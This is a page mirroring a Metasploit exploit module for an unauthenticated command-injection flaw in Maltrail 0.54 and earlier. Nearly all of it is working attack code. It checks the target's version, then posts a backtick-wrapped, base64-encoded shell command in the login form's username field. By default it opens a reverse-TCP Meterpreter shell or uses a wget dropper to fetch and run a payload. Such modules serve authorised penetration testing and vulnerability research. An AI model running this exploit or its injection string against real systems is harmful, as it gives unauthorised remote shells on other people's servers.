Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
19934 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::CmdStager
11
prepend Msf::Exploit::Remote::AutoCheck
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Maltrail Unauthenticated Command Injection',
18
'Description' => %q{
19
Maltrail is a malicious traffic detection system, utilizing publicly
20
available blacklists containing malicious and/or generally suspicious trails.
21
The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
22
The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
23
a command injection vulnerability in the `params.get("username")` parameter.
24
An attacker can exploit this vulnerability by injecting arbitrary OS commands
25
into the username parameter. The injected commands will be executed with the
26
privileges of the running process. This vulnerability can be exploited remotely
27
without authentication.
28
29
Successfully tested against Maltrail versions 0.52 and 0.53.
30
},
31
'License' => MSF_LICENSE,
32
'Author' => [
33
'Ege BALCI <egebalci[at]pm.me>', # msf module
34
'Valentin Lobstein', # Add CVE reference + rewrite
35
'Chris Wild', # original PoC, analysis
36
],
37
'References' => [
38
['EDB', '51676'],
39
['CVE', '2025-34073'],
40
['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
41
['URL', 'https://github.com/stamparm/maltrail/issues/19146']
42
],
43
'Platform' => %w[unix linux],
44
'Privileged' => false,
45
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
46
'Targets' => [
47
[
48
'Unix Command',
49
{
50
'Platform' => 'unix',
51
'Arch' => ARCH_CMD,
52
'Type' => :unix_cmd,
53
'DefaultOptions' => {
54
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
55
}
56
}
57
],
58
[
59
'Linux Dropper',
60
{
61
'Platform' => 'linux',
62
'Arch' => [ARCH_X86, ARCH_X64],
63
'Type' => :linux_dropper,
64
'CmdStagerFlavor' => :wget,
65
'DefaultOptions' => {
66
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
67
}
68
}
69
]
70
],
71
'DisclosureDate' => '2023-07-31',
72
'DefaultTarget' => 0,
73
'Notes' => {
74
'Stability' => [CRASH_SAFE],
75
'Reliability' => [REPEATABLE_SESSION],
76
'SideEffects' => []
77
}
78
)
79
)
80
register_options(
81
[
82
Opt::RPORT(8338),
83
OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
84
]
85
)
86
end
87
88
def check
89
res = send_request_cgi(
90
'uri' => normalize_uri(target_uri.path),
91
'method' => 'GET'
92
)
93
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
94
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
95
96
version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}
97
98
if version < Rex::Version.new('0.54')
99
return CheckCode::Appears("Version Detected: #{version}")
100
end
101
102
CheckCode::Safe("Version Detected: #{version}")
103
end
104
105
def execute_command(cmd, _opts = {})
106
send_request_cgi(
107
'uri' => normalize_uri(target_uri.path, 'login'),
108
'method' => 'POST',
109
'uri_encode_mode' => 'none',
110
'headers' => {
111
'ctype' => 'application/x-www-form-urlencoded'
112
},
113
'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
114
)
115
end
116
117
def exploit
118
case target['Type']
119
when :unix_cmd
120
print_status("Executing #{target.name}...")
121
execute_command(payload.encoded)
122
when :linux_dropper
123
print_status("Executing #{target.name}...")
124
execute_cmdstager
125
end
126
end
127
end
128
129